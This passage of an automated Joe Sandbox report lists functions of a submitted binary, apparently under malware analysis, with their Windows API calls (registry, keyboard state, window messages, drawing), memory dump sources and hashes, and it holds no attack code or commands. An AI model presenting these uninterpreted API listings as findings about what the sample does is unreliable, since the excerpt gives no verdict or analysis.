                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1457242333-0
                                                                                                                                                                  • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                                                  • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                                                                                  • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                                                  • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                                                                                  Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConnectRegistry
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 76216097-0
                                                                                                                                                                  • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                                                  • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                                                                                  • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                                                  • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                                                                                  Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                  • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                                                                                  • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                                                                                  • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                                                                                  • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                                                                                  • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                                                                                  • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                                                                                  • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4082120231-0
                                                                                                                                                                  • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                                                  • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                                                                                  • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                                                  • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                                                                                  Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$ConnectEnumOpenRegistryValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1413298697-0
                                                                                                                                                                  • Opcode ID: 7cc3fb130c94ff833dd9a48eb64f719431195d72c0eb17414c4753cfa71789d1
                                                                                                                                                                  • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                                                                                  • Opcode Fuzzy Hash: 7cc3fb130c94ff833dd9a48eb64f719431195d72c0eb17414c4753cfa71789d1
                                                                                                                                                                  • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                                                                                  Function 0041AAA1 Relevance: 10.7, APIs: 7, Instructions: 196COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetStartupInfoW.KERNEL32(?), ref: 0041AAAE
                                                                                                                                                                    • Part of subcall function 00416B49: Sleep.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00416B71
                                                                                                                                                                  • GetFileType.KERNEL32(?), ref: 0041ABE1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileInfoSleepStartupType
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1527402494-0
                                                                                                                                                                  • Opcode ID: f5ad439157debf0731eb09ee09d84389162392039795a7b6791dab7457716719
                                                                                                                                                                  • Instruction ID: 02b76c019d8a3bae1def7e59c842a1f1d399f548cc34b69872dea7f72cfbe790
                                                                                                                                                                  • Opcode Fuzzy Hash: f5ad439157debf0731eb09ee09d84389162392039795a7b6791dab7457716719
                                                                                                                                                                  • Instruction Fuzzy Hash: DB6109715063418FD710CF28D98869A7BA1BF06324F244A6ED566CB3E1E738D895C78E
                                                                                                                                                                  Function 0045DC4C Relevance: 10.7, APIs: 7, Instructions: 190COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0045DCAF
                                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 0045DCB9
                                                                                                                                                                  • CoUninitialize.OLE32 ref: 0045DCC3
                                                                                                                                                                  • SHGetDesktopFolder.SHELL32(00000000,?), ref: 0045DD62
                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0045DE0E
                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0045DE30
                                                                                                                                                                  • CoUninitialize.OLE32 ref: 0045DE7E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2470771137-0
                                                                                                                                                                  • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                                                  • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                                                                                  • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                                                  • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                                                                                  Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetParent.USER32(?), ref: 0044443B
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                                  • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                                                                  • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                                                                                  • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                                                                  • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                                                                                  Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetParent.USER32(?), ref: 00444633
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                                                                                  • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                                  • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                                                                  • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                                                                                  • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                                                                  • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                                                                                  Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                                                                                  • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                                                                                  • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2354583917-0
                                                                                                                                                                  • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                                                                  • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                                                                                  • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                                                                  • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                                                                                  Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                                                  • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                                                  • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                                                                                  Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                                                                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 896007046-0
                                                                                                                                                                  • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                                                  • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                                                                                  • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                                                                                  Function 00440D98 Relevance: 10.6, APIs: 7, Instructions: 119windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                                                                  • SendMessageW.USER32(03311C00,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                                                                  • SendMessageW.USER32(03311C00,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$LongWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 312131281-0
                                                                                                                                                                  • Opcode ID: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
                                                                                                                                                                  • Instruction ID: 2c169baf4234265a3f6c05f50e500cf46f5ce099e15a3d3a23704bf731ec4cbe
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
                                                                                                                                                                  • Instruction Fuzzy Hash: 944189342402119FE720CF58DDC4F2A77A1FF9A710F6049A9E2119B3A1CB74ACA2CB58
